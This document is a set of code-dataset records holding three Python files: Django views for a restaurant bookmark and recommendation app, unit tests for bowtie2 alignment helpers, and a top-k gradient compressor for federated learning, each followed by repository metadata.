store.bookmarks.filter(pk=i).exists():\n if not bookmarks:\n store.store_cnt += 1\n store.save()\n store.bookmarks.add(i)\n\n return Response(status=status.HTTP_201_CREATED)\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n\n@api_view([\"POST\"])\ndef bookmark_del(request, bookmark_pk):\n if request.user.is_authenticated:\n bookmark = get_object_or_404(Bookmark, pk=bookmark_pk)\n if not request.user.bookmark_set.filter(pk=bookmark_pk).exists():\n return Response({'detail':'권한이 없습니다.'}, status=status.HTTP_403_FORBIDDEN)\n\n ids = request.data['id']\n for i in ids:\n if bookmark.stores.filter(pk=i).exists():\n bookmark.stores.remove(i)\n bookmarks = request.user.bookmark_set.filter(stores=i)\n store = get_object_or_404(Store, pk=i)\n\n if not bookmarks:\n store.store_cnt -= 1\n store.save()\n serializer = BookmarkSerializer(bookmark)\n return Response(serializer.data)\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n\n@api_view([\"GET\"])\ndef hashtag_similar(request):\n if request.user.is_authenticated:\n # 북마크가 있을 경우\n if request.user.bookmark_set.all():\n # 북마크에 있는 모든 스토어\n bookmarks = request.user.bookmark_set.values('stores')\n # 가장 해시태그\n topstores = Review.objects.filter(store_id__in=bookmarks).values('hashtags').annotate(Count('hashtags')).order_by('-hashtags__count')[0]\n # 가장 많은 해시태그의 그룹\n hashtag = Hashtag.objects.get(pk=topstores['hashtags']).group\n # 해당 그룹의 다른 멤버 해시태그\n tags = Hashtag.objects.filter(group=hashtag).values_list('id').order_by('?')[:4]\n\n similar_hashtag = []\n for tag in tags:\n similar_reviews = Review.objects.filter(hashtags__in=tag).order_by('?')[:8]\n similar_stores = Store.objects.filter(review__in=similar_reviews)\n serializer = StoreSerializer(similar_stores, many=True)\n tag = Hashtag.objects.get(id__in=tag).title\n data = {\n \"hashtag\" : tag,\n \"stores\":serializer.data\n }\n similar_hashtag.append(data)\n \n return Response(similar_hashtag)\n\n # 북마크가 없을 경우\n else:\n tags = Hashtag.objects.values_list('id').order_by('?')[:4]\n similar_hashtag = []\n for tag in tags:\n similar_reviews = Review.objects.filter(hashtags__in=tag).order_by('?')[:8]\n similar_stores = Store.objects.filter(review__in=similar_reviews)\n serializer = StoreSerializer(similar_stores, many=True)\n tag = Hashtag.objects.get(id__in=tag).title\n data = {\n \"hashtag\" : tag,\n \"stores\":serializer.data\n }\n similar_hashtag.append(data)\n return Response(similar_hashtag)\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n\nfrom mlxtend.frequent_patterns import association_rules\nfrom mlxtend.preprocessing import TransactionEncoder\nfrom mlxtend.frequent_patterns import apriori\nimport pandas as pd\n\n@api_view([\"POST\"])\ndef create_recom_data(request): # DB에 생성된 모든 북마크 간 유사도 비교한 데이터 만들기(주기적으로 update해줘야함)\n bookmarks = Bookmark.objects.all()\n\n stores = []\n for bookmark in bookmarks:\n bm = []\n for store in bookmark.stores.all():\n bm.append(store.store_name)\n stores.append(bm)\n\n # 위 dataset을 True, False로 표시하고 dataframe으로 나타냄\n te = TransactionEncoder()\n te_result = te.fit(stores).transform(stores)\n df = pd.DataFrame(te_result, columns=te.columns_)\n # 데이터 프레임에서 각 itemset의 support를 구함\n # min_support이상의 support부터 나타남\n frequent = apriori(df, min_support=0.001, use_colnames=True)\n # 특정 개수 이상의 itemset만 추출\n frequent['length'] = frequent['itemsets'].apply(lambda x: len(x))\n freq1 = frequent[frequent['length'] <= 6]\n print(freq1)\n\n # 신뢰도 구하기\n # 최소 신뢰도가 0.8이상인 것만 추출\n rules = association_rules(freq1, metric='confidence', min_threshold=0.8)\n df = rules.sort_values(by=['lift'], ascending=False)\n df['antec_length'] = df['antecedents'].apply(lambda x: len(x))\n result = df.sort_values(by=['antec_length', 'lift'], ascending=False)\n\n def remove_set(string):\n new_string = \"\"\n for c in string:\n if c not in [\"frozenset\", '\"', \"(\", \")\", \"{\", \"}\", \"'\"]:\n new_string += c\n return new_string[9:]\n\n\n df.to_csv(\"recommendation.csv\", index=False, encoding='utf-8-sig')\n doc = pd.read_csv('recommendation.csv')\n doc['antecedents'] = doc['antecedents'].apply(remove_set)\n doc['consequents'] = doc['consequents'].apply(remove_set)\n print(doc)\n doc.to_csv(\"recommendation_final.csv\", index=False, encoding='utf-8-sig')\n return Response({'detail':'success'})\n\n# bookmarks = Bookmark.objects.all()\n# stores = []\n# for bookmark in bookmarks:\n# bm = []\n# for store in bookmark.stores.all():\n# bm.append(store.store_name)\n# stores.append(bm)\n\n# te = TransactionEncoder()\n# te_result = te.fit(stores).transform(stores)\n# df = pd.DataFrame(te_result, columns=te.columns_)\n# print(df)\n# # 데이터 프레임에서 각 itemset의 support를 구함\n# # min_support이상의 support부터 나타남\n# frequent = apriori(df, min_support=0.001, use_colnames=True)\n# print(frequent)\n# bookmark = get_object_or_404(Bookmark, pk=1)\n# print(bookmark.stores.all())\n# bookmark = get_object_or_404(Bookmark, pk=5)\n# print(bookmark.stores.all())\n# bookmark = get_object_or_404(Bookmark, pk=6)\n# print(bookmark.stores.all())\n# bookmark = get_object_or_404(Bookmark, pk=7)\n# print(bookmark.stores.all())\n\n\nfrom accounts.models import User\n@api_view([\"GET\"])\ndef recommendation_lst(request):\n # user = get_object_or_404(User, pk=2)\n user = request.user\n user_bookmarks = user.bookmark_set.all()\n\n # 로그인한 유저가 북마크한 식당들\n user_store_lst = set()\n for bookmark in user_bookmarks:\n for store in bookmark.stores.all():\n user_store_lst.add(store.store_name)\n\n try:\n # 이미 북마크 사이 유사도가 분석되어 있는 데이터 가져옴 \n df = pd.read_csv('recommendation_final.csv')\n\n def str_to_set(stores):\n store_lst = set([store.strip() for store in stores.split(',')])\n return store_lst\n\n df['antecedents'] = df['antecedents'].apply(str_to_set)\n df['consequents'] = df['consequents'].apply(str_to_set)\n \n result = df[df['antecedents'] >= user_store_lst].sort_values(by=['antec_length', 'lift'], ascending=[False, False])\n recommend_stores = result['consequents']\n except:\n recommend_stores = []\n \n # 추천된 식당 담을 set(str으로 담김)\n recommend_result = set()\n for lst in recommend_stores:\n for store in lst:\n if len(recommend_result) == 6: # 6개까지만 추천\n break\n if store not in user_store_lst:\n recommend_result.add(store)\n if recommend_result:\n # str으로 담긴 추천 식당을 queryset으로 담음\n store_detail = []\n for store in recommend_result:\n store_detail.append(get_object_or_404(Store, store_name=store))\n if len(recommend_result) == 10:\n # 추천 식당 serialize\n serializer = StoreSerializer(store_detail, many=True)\n storeList = custom_store_serializer(serializer.data)\n else: # 북마크 기반 추천을 6개 받지 못하면 나머지는 랜덤으로 받음\n recommend_stores = Store.objects.order_by('?')[:10-len(recommend_result)]\n store_detail += recommend_stores\n serializer = StoreSerializer(store_detail, many=True)\n storeList = custom_store_serializer(serializer.data)\n else: # 사용자의 북마크가 없을 때\n recommend_stores = Store.objects.order_by('?')[:10]\n # print(recommend_stores)\n serializer = StoreSerializer(recommend_stores, many=True)\n storeList = custom_store_serializer(serializer.data)\n \n return Response(storeList)\n", "repo_name": "hoya0415/K-Chelin", "sub_path": "backend/bookmarks/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 12292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 20, "usage_type": "call"}, {"api_name": "stores.models.Store", "line_number": 20, "usage_type": "argument"}, {"api_name": "stores.serializers.StoreDetailSerializer", "line_number": 21, "usage_type": "call"}, {"api_name": "stores.serializers.StoreDetailSerializer", "line_number": 36, "usage_type": "call"}, {"api_name": "serializers.BookmarkListSerializer", "line_number": 50, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 51, "usage_type": "call"}, {"api_name": "serializers.BookmarkListSerializer", "line_number": 53, "usage_type": "call"}, {"api_name": "serializers.BookmarkListSerializer", "line_number": 58, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 59, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 59, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 59, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 46, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Bookmark", "line_number": 64, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 66, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 66, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 66, "usage_type": "name"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 70, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 75, "usage_type": "call"}, {"api_name": "serializers.BookmarkListSerializer", "line_number": 78, "usage_type": "call"}, {"api_name": "serializers.BookmarkListSerializer", "line_number": 85, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 86, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 86, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 86, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 62, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 92, "usage_type": "call"}, {"api_name": "stores.models.Store", "line_number": 92, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 97, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 97, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 105, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 105, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 105, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 106, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 106, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 106, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Bookmark", "line_number": 112, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 114, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 114, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 114, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 121, "usage_type": "call"}, {"api_name": "stores.models.Store", "line_number": 121, "usage_type": "argument"}, {"api_name": "serializers.BookmarkSerializer", "line_number": 126, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 127, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 128, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 128, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 128, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 109, "usage_type": "call"}, {"api_name": "reviews.models.Review.objects.filter", "line_number": 139, "usage_type": "call"}, {"api_name": "reviews.models.Review.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "reviews.models.Review", "line_number": 139, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 139, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects.get", "line_number": 141, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "reviews.models.Hashtag", "line_number": 141, "usage_type": "name"}, {"api_name": "reviews.models.Hashtag.objects.filter", "line_number": 143, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "reviews.models.Hashtag", "line_number": 143, "usage_type": "name"}, {"api_name": "reviews.models.Review.objects.filter", "line_number": 147, "usage_type": "call"}, {"api_name": "reviews.models.Review.objects", "line_number": 147, "usage_type": "attribute"}, {"api_name": "reviews.models.Review", "line_number": 147, "usage_type": "name"}, {"api_name": "stores.models.Store.objects.filter", "line_number": 148, "usage_type": "call"}, {"api_name": "stores.models.Store.objects", "line_number": 148, "usage_type": "attribute"}, {"api_name": "stores.models.Store", "line_number": 148, "usage_type": "name"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 149, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects.get", "line_number": 150, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "reviews.models.Hashtag", "line_number": 150, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 157, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects.values_list", "line_number": 161, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "reviews.models.Hashtag", "line_number": 161, "usage_type": "name"}, {"api_name": "reviews.models.Review.objects.filter", "line_number": 164, "usage_type": "call"}, {"api_name": "reviews.models.Review.objects", "line_number": 164, "usage_type": "attribute"}, {"api_name": "reviews.models.Review", "line_number": 164, "usage_type": "name"}, {"api_name": "stores.models.Store.objects.filter", "line_number": 165, "usage_type": "call"}, {"api_name": "stores.models.Store.objects", "line_number": 165, "usage_type": "attribute"}, {"api_name": "stores.models.Store", "line_number": 165, "usage_type": "name"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 166, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects.get", "line_number": 167, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects", "line_number": 167, "usage_type": "attribute"}, {"api_name": "reviews.models.Hashtag", "line_number": 167, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 173, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 174, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 174, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 174, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 131, "usage_type": "call"}, {"api_name": "models.Bookmark.objects.all", "line_number": 184, "usage_type": "call"}, {"api_name": "models.Bookmark.objects", "line_number": 184, "usage_type": "attribute"}, {"api_name": "models.Bookmark", "line_number": 184, "usage_type": "name"}, {"api_name": "stores.models", "line_number": 186, "usage_type": "name"}, {"api_name": "stores.models.append", "line_number": 191, "usage_type": "call"}, {"api_name": "stores.models", "line_number": 191, "usage_type": "name"}, {"api_name": "mlxtend.preprocessing.TransactionEncoder", "line_number": 194, "usage_type": "call"}, {"api_name": "stores.models", "line_number": 195, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 196, "usage_type": "call"}, {"api_name": "mlxtend.frequent_patterns.apriori", "line_number": 199, "usage_type": "call"}, {"api_name": "mlxtend.frequent_patterns.association_rules", "line_number": 207, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 221, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 226, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 182, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 269, "usage_type": "call"}, {"api_name": "stores.models.split", "line_number": 272, "usage_type": "call"}, {"api_name": "stores.models", "line_number": 272, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 295, "usage_type": "call"}, {"api_name": "stores.models.Store", "line_number": 295, "usage_type": "argument"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 298, "usage_type": "call"}, {"api_name": "stores.models.Store.objects.order_by", "line_number": 301, "usage_type": "call"}, {"api_name": "stores.models.Store.objects", "line_number": 301, "usage_type": "attribute"}, {"api_name": "stores.models.Store", "line_number": 301, "usage_type": "name"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 303, "usage_type": "call"}, {"api_name": "stores.models.Store.objects.order_by", "line_number": 306, "usage_type": "call"}, {"api_name": "stores.models.Store.objects", "line_number": 306, "usage_type": "attribute"}, {"api_name": "stores.models.Store", "line_number": 306, "usage_type": "name"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 308, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 311, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 255, "usage_type": "call"}]} +{"seq_id": "24088036777", "text": "#!/usr/bin/python\n\nimport unittest\nimport tempfile\nimport os\nfrom glob import glob\nimport vxdetector.interact_bowtie2 as ibo\nimport shutil\n\n\nclass test_mapbowtie2(unittest.TestCase):\n def setUp(self):\n self.path = f'{os.path.dirname(__file__)}/'\n ibo.buildbowtie2(f'{self.path}test_data/')\n self.fasta_file = (f'{self.path}test_data/'\n '5011_S225_L001_R1_001.fastq.gz')\n self.read2_file = (f'{self.path}test_data/'\n '5011_S225_L001_R2_001.fastq.gz')\n self.test_unpaired = f'{self.path}test_data/unpaired/unpaired.sam'\n self.test_paired = f'{self.path}test_data/paired/paired.bed'\n self.fp_tmpdir = tempfile.mkdtemp()\n\n def tearDown(self):\n file_list = glob(f'{self.path}test_data/Indexed_bt2/*.bt2')\n for file in file_list:\n os.remove(file)\n shutil.rmtree(self.fp_tmpdir)\n\n def test_aligned_path(self):\n path = f'{os.path.dirname(__file__)}/test_data/'\n paired = False\n temp_path = self.fp_tmpdir\n aligned_path, Error = ibo.mapbowtie2(self.fasta_file, self.read2_file,\n path, temp_path, paired)\n self.assertEqual(aligned_path, f'{temp_path}unpaired.bam')\n self.assertEqual(Error, False)\n paired = True\n aligned_path, Error = ibo.mapbowtie2(self.fasta_file, self.read2_file,\n path, temp_path, paired)\n self.assertEqual(aligned_path, f'{temp_path}paired.bed')\n self.assertEqual(Error, False)\n\n def test_pipe(self):\n samtools_path = shutil.which('samtools')\n if samtools_path is None:\n samtools_path = '$CONDA/bin/samtools'\n path = f'{os.path.dirname(__file__)}/test_data/'\n paired = False\n temp_path = self.fp_tmpdir\n content = []\n with open(self.test_unpaired)as f:\n for line in f:\n content.append(line.strip().split())\n ibo.mapbowtie2(self.fasta_file, self.read2_file,\n path, temp_path, paired)\n os.system(f'{samtools_path} view {temp_path}unpaired.bam '\n f'> {temp_path}unpaired.sam')\n output = []\n with open(f'{temp_path}unpaired.sam') as f:\n for line in f:\n output.append(line.strip().split())\n self.assertEqual(output, content)\n paired = True\n content = []\n with open(self.test_paired)as f:\n for line in f:\n content.append(line.strip().split())\n ibo.mapbowtie2(self.fasta_file, self.read2_file,\n path, temp_path, paired)\n output = []\n with open(f'{temp_path}paired.bed')as f:\n for line in f:\n output.append(line.strip().split())\n self.assertEqual(output, content)\n\n def test_wrong_file_type(self):\n path = f'{os.path.dirname(__file__)}/test_data/'\n read2_file = f'{path}test_data/paired/BED.bed'\n paired = True\n aligned_path, Error = ibo.mapbowtie2(self.fasta_file, read2_file,\n path, self.fp_tmpdir, paired)\n self.assertEqual(Error, True)\n paired = False\n fasta_file_local = f'{path}test_data/paired/BED.bed'\n aligned_path, Error = ibo.mapbowtie2(fasta_file_local, read2_file,\n path, self.fp_tmpdir, paired)\n self.assertEqual(Error, True)\n\n def test_no_index(self):\n no_index_path = f'{self.fp_tmpdir}/'\n with self.assertRaises(FileNotFoundError) as cm:\n ibo.mapbowtie2(self.fasta_file, self.read2_file, no_index_path,\n self.fp_tmpdir, False)\n self.assertEqual(f'No Index files found under \"{no_index_path}'\n 'Indexed_bt2/bowtie2\"', str(cm.exception))\n\n\nclass test_buildbowtie2(unittest.TestCase):\n def tearDown(self):\n path = f'{os.path.dirname(__file__)}/'\n file_list = glob(f'{path}test_data/Indexed_bt2/*.bt2')\n for file in file_list:\n os.remove(file)\n\n def test_index(self):\n path = f'{os.path.dirname(__file__)}/'\n ibo.buildbowtie2(f'{path}test_data/')\n self.assertEqual(os.path.exists(f'{path}test_data/Indexed_bt2'\n '/bowtie2.1.bt2'), True)\n", "repo_name": "jlab/algorithm_vxdetector", "sub_path": "vxdetector/tests/test_interact_bowtie.py", "file_name": "test_interact_bowtie.py", "file_ext": "py", "file_size_in_byte": 4403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "vxdetector.interact_bowtie2.buildbowtie2", "line_number": 14, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 14, "usage_type": "name"}, {"api_name": "tempfile.mkdtemp", "line_number": 21, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 24, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 26, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 33, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 33, "usage_type": "name"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 38, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 38, "usage_type": "name"}, {"api_name": "shutil.which", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 54, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 54, "usage_type": "name"}, {"api_name": "os.system", "line_number": 56, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 68, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 68, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 80, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 80, "usage_type": "name"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 85, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 85, "usage_type": "name"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 92, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 92, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 101, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "vxdetector.interact_bowtie2.buildbowtie2", "line_number": 107, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}]} +{"seq_id": "5923755115", "text": "import torch\nfrom copy import deepcopy as dcopy\nimport math\nimport collections\n\n\nclass topkCompressor:\n def __init__(self, compress_rate: float = 0.5, device=torch.device(\"cpu\")):\n self.compress_rate = compress_rate\n self.device = device\n\n def set_compress_rate(self, compress_rate):\n self.compress_rate = compress_rate\n\n def compress(self, gradient_dict: dict, compress: bool = True):\n if gradient_dict['compressed']:\n return gradient_dict\n\n # gradient_tmp = dcopy(gradient_dict['gradient'])\n\n new_gradient = {}\n for k in gradient_dict.keys():\n if k == \"gradient\":\n new_gradient[\"gradient\"] = collections.OrderedDict({k: None for k in gradient_dict['gradient'].keys()})\n else:\n new_gradient[k] = gradient_dict[k]\n\n for k in gradient_dict['gradient'].keys():\n tensor = gradient_dict['gradient'][k].to(self.device)\n\n shape = list(tensor.size())\n tensor = tensor.flatten()\n numel = tensor.numel()\n tensor_calculate = tensor\n\n tensor_calculate = tensor_calculate.abs()\n tensor_calculate_filtered = tensor_calculate[tensor_calculate > 0]\n\n if len(tensor_calculate) == 0 or self.compress_rate == 1.0:\n compress = False\n\n if compress:\n cr = max(0.0, min(1.0, self.compress_rate))\n thr = find_threshold_by_sort(tensor_calculate_filtered, cr)\n # thr = find_threshold_by_approach(tensor_calculate_filtered, cr)\n\n mask = tensor_calculate.to(self.device) >= thr\n else:\n mask = tensor.abs().to(self.device) > 0\n\n indices, = torch.where(mask)\n values = tensor[indices]\n\n tensor_compressed = values.cpu().tolist()\n ctx = shape, mask.cpu().tolist(), numel\n new_gradient['gradient'][k] = (tensor_compressed, ctx)\n new_gradient['compressed'] = True\n return new_gradient\n\n def gf_compress(self, gradient_dict: dict, global_gradient_dict, fusion_ratio=0.5, compress: bool = True):\n if gradient_dict['compressed']:\n return gradient_dict\n\n if global_gradient_dict is None:\n return self.compress(gradient_dict=gradient_dict,\n compress=True)\n\n new_gradient = {}\n for k in gradient_dict.keys():\n if k == \"gradient\":\n new_gradient[\"gradient\"] = collections.OrderedDict({k: None for k in gradient_dict['gradient'].keys()})\n else:\n new_gradient[k] = gradient_dict[k]\n\n for k in gradient_dict['gradient'].keys():\n tensor = gradient_dict['gradient'][k].to(self.device)\n gf_tensor = global_gradient_dict['gradient'][k].to(self.device)\n\n shape = list(tensor.size())\n tensor = tensor.flatten()\n numel = tensor.numel()\n tensor_calculate = tensor\n\n gf_tensor = gf_tensor.flatten()\n gf_tensor_calculate = gf_tensor\n\n mix_tensor_calculate = torch.add(normalize(tensor_calculate.abs()),\n normalize(gf_tensor_calculate.abs()).mul(fusion_ratio/(1-fusion_ratio)))\n\n mix_tensor_calculate_filtered = mix_tensor_calculate[mix_tensor_calculate > 0]\n\n if len(tensor_calculate) == 0 or self.compress_rate == 1.0:\n compress = False\n\n if compress:\n cr = max(0.0, min(1.0, self.compress_rate))\n thr = find_threshold_by_sort(mix_tensor_calculate_filtered, cr)\n # thr = find_threshold_by_approach(tensor_calculate_filtered, cr)\n\n mask = mix_tensor_calculate.to(self.device) >= thr\n else:\n mask = tensor.abs().to(self.device) > 0\n\n indices, = torch.where(mask)\n values = tensor[indices]\n\n tensor_compressed = values.cpu().tolist()\n ctx = shape, mask.cpu().tolist(), numel\n new_gradient['gradient'][k] = (tensor_compressed, ctx)\n new_gradient['compressed'] = True\n return new_gradient\n\n def decompress(self, gradient_dict: dict):\n if not gradient_dict['compressed']:\n return gradient_dict\n\n new_gradient = {}\n for k in gradient_dict.keys():\n if k == \"gradient\":\n new_gradient[\"gradient\"] = collections.OrderedDict({k: None for k in gradient_dict['gradient'].keys()})\n else:\n new_gradient[k] = gradient_dict[k]\n\n for k in gradient_dict['gradient'].keys():\n # print(time.time())\n j = gradient_dict['gradient'][k]\n new_mem, ctx = j\n shape, mask, numel = ctx\n\n values = torch.tensor(new_mem).to(self.device)\n indices = torch.tensor([i for i in range(len(mask)) if mask[i]]).type(torch.long).to(self.device)\n mask = torch.tensor(mask)\n\n tensor_decompressed = torch.zeros(numel, dtype=values.dtype, layout=values.layout, device=values.device)\n tensor_decompressed.scatter_(0, indices, values)\n new_gradient['gradient'][k] = tensor_decompressed.view(shape)\n new_gradient['compressed'] = False\n return new_gradient\n\n\ndef find_threshold_buildin_function(tensor, compress_rate=1.0):\n thr = torch.min(\n torch.topk(tensor.abs(), max(1, int(tensor.numel() * compress_rate)), largest=True, sorted=False)[0])\n return thr\n\n\ndef find_threshold_by_sort(tensor, cr):\n numel = tensor.numel()\n idx = max(0, min(numel, round(numel * float(cr))))\n values, _ = torch.sort(tensor)\n values = torch.fliplr(values.unsqueeze(0)).squeeze(0)\n return values[idx]\n\n\ndef find_threshold_by_approach(tensor, compress_rate=1.0, max_iter=10, device=torch.device(\"cpu\")):\n tmin = torch.min(tensor)\n tmax = torch.max(tensor)\n threshold = 0.0\n for _ in range(max_iter):\n threshold = (tmax + tmin) / 2.0\n mask = tensor.abs().to(device) >= threshold\n selected = mask.sum()\n # +- 5% is ok\n if selected > (tensor.numel() * min(compress_rate + 0.05, 1)):\n tmin = threshold\n continue\n if selected < (tensor.numel() * max(compress_rate - 0.05, 0.01)):\n tmax = threshold\n continue\n break\n return threshold\n\n\ndef normalize(value):\n value /= torch.norm(value)\n return value\n", "repo_name": "tony92151/global-momentum-fusion-fl", "sub_path": "sparse_optimizer/topk_compressor.py", "file_name": "topk_compressor.py", "file_ext": "py", "file_size_in_byte": 6517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.device", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 51, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.add", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 104, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 131, "usage_type": "attribute"}, {"api_name": 